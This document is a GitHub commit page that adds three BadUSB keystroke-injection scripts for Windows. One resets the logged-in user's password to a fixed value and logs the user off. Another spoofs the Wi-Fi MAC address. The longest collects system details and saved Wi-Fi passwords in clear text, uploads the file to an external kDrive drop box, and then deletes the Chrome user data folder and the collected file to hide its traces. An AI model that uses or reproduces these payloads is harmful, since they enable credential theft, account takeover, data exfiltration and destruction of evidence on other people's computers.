Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history 
3 new scripts
  • Loading branch information
@Miiraak
Miiraak committed Jun 16, 2024
1 parent 4a16893 commit ef039bd
Show file tree
Hide file tree
Showing 3 changed files with 177 additions and 0 deletions.
31 changes: 31 additions & 0 deletions MesTrucs/BadUSB/ChangementMotDePasse.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
REM ####################################################################################
REM # |
REM # Title : MDP Change |
REM # Author : Miiraak |
REM # Version : 1.0 |
REM # Category : Credential |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################################################

REM Requirements:
REM - Admin PowerShell

REM Description:
REM - Ouvre un PowerShell en admin.
REM - Change le mot de passe de l'utilisateur.
REM - Déconnecte l'utilisateur.

REM Ouvre un PowerShell en admin.
DEFAULT_DELAY 500
GUI r
STRING powershell
CTRL-SHIFT ENTER
LEFT
ENTER

REM Change le mot de passe.
STRINGLN net user $env:USERNAME Welcome99

REM Deconnecte l'utilisateur.
STRINGLN shutdown -l
47 changes: 47 additions & 0 deletions MesTrucs/BadUSB/MAC_Spoofing_Windows11-10.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
REM ####################################################################################
REM # |
REM # Title : MAC Spoofing Wi-fi |
REM # Author : Miiraak |
REM # Version : 1.0 |
REM # Category : GoodUSB |
REM # Target : Windows 11 |
REM # |
REM ####################################################################################

REM # Requirements:
REM # - Account with admin privileges

REM # Description:
REM # - Open admin powershell then change the MAC Address.
REM # - Wi-Fi card that support MAC modification

REM # Open shell
DELAY 1000
GUI
DELAY 500
STRING powershell
DELAY 150
RIGHT
DELAY 150
DOWN
DELAY 150
ENTER
DELAY 500
LEFT
DELAY 100
ENTER
DELAY 100

REM # MAC changing
STRING Start-Sleep -Seconds 2
ENTER
DELAY 500
STRING Disable-NetAdapter -Name "Wi-Fi"
ENTER
DELAY 200
STRING Set-NetAdapter -Name "Wi-Fi" -MacAddress "00-11-22-33-44-55"
ENTER
DELAY 200
STRING Enable-NetAdapter -Name "Wi-Fi"
ENTER
DELAY 200
99 changes: 99 additions & 0 deletions MesTrucs/BadUSB/Windows_Data_Gathering.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,99 @@
REM ####################################################################################
REM # |
REM # Title : Information gathering and export |
REM # Author : Miiraak |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Target : Windows |
REM # |
REM ####################################################################################
REM
REM Requirements:
REM - Chrome
REM - kDrive avec une boite de depos. (!!! Remplacez la ligne 49 !!!)
REM
REM Description:
REM - Recupere les information et les stocks dans un fichier .txt dans le dossier root
REM - Ouvre Chrome en navigation privee
REM - Exporte le fichier crée sur une boite de depos Infomaniak.
REM - Supprime l'historique et le fichier cree.
REM
REM ________Gather information________
DEFAULT_DELAY 500
GUI r
STRING powershell
CTRL-SHIFT ENTER
LEFT
ENTER
DEFAULT_DELAY 200
STRINGLN cd /
STRINGLN Get-Date -Format yyyy-MM-dd >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-Date -Format hh-mm-ss >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-CimInstance -ClassName Win32_ComputerSystem >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-Computerinfo >> gathered_data_from_$env:USERNAME.txt;
DELAY 3000
STRINGLN Get-LocalUser >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-CimInstance -ClassName Win32_QuickFixEngineering >> gathered_data_from_$env:USERNAME.txt;
STRINGLN (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> gathered_data_from_$env:USERNAME.txt;
STRINGLN dir env: >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-Service >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-NetTCPConnection | Where-Object -Property State -Match Listen >> gathered_data_from_$env:USERNAME.txt;
STRINGLN Get-NetTCPConnection | Select-Object -Property * >> gathered_data_from_$env:USERNAME.txt;
STRINGLN exit
DEFAULT_DELAY 500
REM ________Export information________
GUI r
STRINGLN chrome.exe
CTRL-SHIFT n
STRINGLN https://kdrive.infomaniak.com/app/collaborate/XXXXXX/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
DELAY 3000
DEFAULT_DELAY 100
TAB
REPEAT 4
DEFAULT_DELAY 500
ENTER
TAB
ENTER
DEFAULT_DELAY 100
TAB
REPEAT 4
DEFAULT_DELAY 500
ENTER
STRINGLN c:/
TAB
STRING gathered_data_from
DELAY 1000
DOWN
RIGHT
ENTER
TAB
TAB
STRING Windows
TAB
STRING Data Gathering -
TAB
STRING [email protected]
DEFAULT_DELAY 100
TAB
REPEAT 8
DEFAULT_DELAY 500
ENTER
DELAY 2000
CTRL w
CTRL w
REM
REM ________RemoveFile & History cleaning________
GUI r
STRING cmd.exe
CTRL-SHIFT ENTER
LEFT
ENTER
STRINGLN @echo off
STRINGLN set ChromeDir=C:\Users\%USERNAME%\AppData\Local\Google\Chrome\
STRINGLN del /q /s /f “%ChromeDir%”
STRINGLN rd /s /q “%ChromeDir%”
STRINGLN cd /
STRINGLN del gathered_data_from_%USERNAME%.txt
STRINGLN exit

0 comments on commit ef039bd

Please sign in to comment.